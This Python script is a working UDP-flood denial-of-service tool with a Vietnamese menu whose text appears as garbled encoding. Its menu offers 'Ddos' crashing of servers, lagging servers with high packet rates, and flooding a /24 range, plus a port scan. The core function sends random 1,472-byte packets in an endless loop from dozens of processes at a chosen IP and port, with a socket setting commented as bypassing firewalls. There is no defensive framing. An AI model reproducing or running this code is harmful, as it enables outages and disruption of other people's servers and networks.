import os, socket, multiprocessing, sys, time, random, json
from urllib.request import urlopen

# --- MГҖU LED CбәҰU Vб»’NG ---
LED_COLORS = ['\033[31m', '\033[38;5;208m', '\033[33m', '\033[32m', '\033[36m', '\033[34m', '\033[35m']
RESET, BOLD, CYAN, WHITE, RED, YELLOW, ORANGE, GREEN, PURPLE, BLUE = '\033[0m', '\033[1m', '\033[36m', '\033[37m', '\033[31m', '\033[33m', '\033[38;5;208m', '\033[32m', '\033[35m', '\033[34m'

# ==============================================================================
# [ Дҗб»ҳNG CЖ  TбәӨN CГ”NG ]
# ==============================================================================

def ghost_storm(ip, port, counter):
    """Дҗб»ҷng cЖЎ Ghost Storm - Tб»‘i Ж°u hГіa bДғng thГҙng"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect((ip, port))
        # Гүp hб»Ү thб»‘ng cбәҘp bб»ҷ Д‘б»Үm gб»ӯi tб»‘i Д‘a
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 10 * 1024 * 1024)
        # Thiбәҝt lбәӯp mГЈ Ж°u tiГӘn nhГ  mбәЎng (Bypass mб»ҷt sб»‘ firewall)
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, 0xB8)
    except: pass
    
    # Dб»Ҝ liб»Үu tД©nh Д‘б»ғ giбәЈm tбәЈi CPU khi tбәЎo gГіi tin
    payload = os.urandom(1472)
    
    while True:
        try:
            sock.send(payload)
            counter.value += 1
        except: continue

def monitor(counter, target):
    """Hб»Ү thб»‘ng giГЎm sГЎt tб»‘c Д‘б»ҷ xбәЈ Д‘бәЎn"""
    last_val = 0
    color_idx = 0
    while True:
        time.sleep(0.8) 
        curr = counter.value
        pps = (curr - last_val) / 0.8
        last_val = curr
        # Chuyб»ғn Д‘б»•i sang MiB/s Д‘б»ғ dб»… nhГ¬n hб»Ҹa lб»ұc
        mib = (pps * 1472) / (1024 * 1024)
        
        color = LED_COLORS[color_idx % len(LED_COLORS)]
        color_idx += 1
        print(f"{color}[+] {int(pps):,} PPS | {mib:.2f} MiB/s | ДҗANG ДҗГҒNH: {target}{RESET}")

def scan_port(ip):
    """DГІ cб»•ng lб»— hб»•ng"""
    print(f"{YELLOW}[*] Дҗang quГ©t lб»— hб»•ng trГӘn {ip}...{RESET}")
    common = [21, 22, 80, 443, 3306, 25565, 19132]
    open_p = []
    for p in common:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(0.3)
        if s.connect_ex((ip, p)) == 0: open_p.append(p)
        s.close()
    print(f"{GREEN}[+] Cб»•ng mб»ҹ tГ¬m thбәҘy: {open_p}{RESET}")
    input(f"{ORANGE}NhбәҘn Enter Д‘б»ғ vб»Ғ Menu...{RESET}")

def show_rainbow_header():
    os.system('clear' if os.name == 'posix' else 'cls')
    c = random.choice(LED_COLORS)
    print(f"{c}    в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—  в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•— в–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв•—   в–Ҳв–Ҳв•—в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•—  в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•— в–Ҳв–Ҳв•—    в–Ҳв–Ҳв•—")
    print(f"{c}    в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘в–Ҳв–Ҳв–Ҳв–Ҳв•—  в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•”в•җв•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘    в–Ҳв–Ҳв•‘")
    print(f"{c}    в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•”в–Ҳв–Ҳв•— в–Ҳв–Ҳв•‘в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қв–Ҳв–Ҳв•‘   в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘ в–Ҳв•— в–Ҳв–Ҳв•‘")
    print(f"{c}    в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘в•ҡв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•”в•җв•җв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘   в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘в–Ҳв–Ҳв–Ҳв•—в–Ҳв–Ҳв•‘")
    print(f"{c}    в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘  в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘в–Ҳв–Ҳв•‘ в•ҡв–Ҳв–Ҳв–Ҳв–Ҳв•‘в–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қв•ҡв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв–Ҳв•”в•қв•ҡв–Ҳв–Ҳв–Ҳв•”в–Ҳв–Ҳв–Ҳв•”в•қ")
    print(f"{c}    в•ҡв•җв•қ  в•ҡв•җв•қв•ҡв•җв•қ  в•ҡв•җв•қв•ҡв•җв•қв•ҡв•җв•қ  в•ҡв•җв•җв•җв•қв•ҡв•җв•җв•җв•җв•җв•қ  в•ҡв•җв•җв•җв•җв•җв•қ  в•ҡв•җв•җв•қв•ҡв•җв•җв•қ ")
    print(f"\n{CYAN}{BOLD}    >>> v31.3 REPLIT FAST - ADMIN: NGUYб»„N THГҖNH LONG <<<    {RESET}")
    print(f"{WHITE}================================================================================{RESET}")

# ==============================================================================
# [ LUб»’NG CHГҚNH ]
# ==============================================================================

def main():
    while True:
        show_rainbow_header()
        print(f"{RED}[1] Ddos sбәӯp server{RESET}")
        print(f"{YELLOW}[2] LГ m lag server (High PPS){RESET}")
        print(f"{GREEN}[3] ДҗГЎnh dбәЈi IP /24{RESET}")
        print(f"{BLUE}[4] DГІ cб»•ng (Scan Port){RESET}")
        print(f"{PURPLE}[0] ThoГЎt{RESET}")
        
        choice = input(f"\n{CYAN}Lб»ұa chб»Қn cб»§a Long: {RESET}")
        if choice == '0': sys.exit()
        
        target = input(f"{BOLD}Mб»Ҙc tiГӘu (IP/Domain): {RESET}").strip()
        try: target_ip = socket.gethostbyname(target)
        except: 
            print(f"{RED}[!] Lб»—i DNS: KhГҙng tГ¬m thбәҘy IP mб»Ҙc tiГӘu.{RESET}")
            time.sleep(2); continue
            
        if choice == '4': scan_port(target_ip); continue
            
        try:
            port = int(input(f"{BOLD}Port: {RESET}"))
            trigger = int(input(f"{BOLD}Hбә№n giб»қ (giГўy): {RESET}"))
        except: continue

        # Дҗбәҝm ngЖ°б»Јc Д‘б»•i mГ u
        for i in range(trigger, 0, -1):
            color = LED_COLORS[i % len(LED_COLORS)]
            sys.stdout.write(f"\r{color}[!] KHAI Hб»ҺA SAU: {i} GIГӮY... {RESET}")
            sys.stdout.flush(); time.sleep(1)
        
        print(f"\n{RED}[+] Tб»”NG Lб»°C TбәӨN CГ”NG !!!{RESET}\n")

        shared_counter = multiprocessing.Value('L', 0, lock=False)
        procs = []
        
        # Tб»‘i Ж°u hГіa sб»‘ luб»“ng cho Replit (TrГЎnh bб»Ӣ sбәӯp Repl)
        cores = os.cpu_count() or 1
        for _ in range(cores * 20): 
            p = multiprocessing.Process(target=ghost_storm, args=(target_ip, port, shared_counter))
            p.daemon = True; p.start(); procs.append(p)

        m = multiprocessing.Process(target=monitor, args=(shared_counter, target_ip))
        m.daemon = True; m.start()
        
        try:
            while True: time.sleep(1)
        except KeyboardInterrupt:
            for p in procs: p.terminate()
            m.terminate(); print(f"\n{PURPLE}[!] ДҗГЈ thu quГўn.{RESET}"); time.sleep(1)

if __name__ == "__main__":
    main()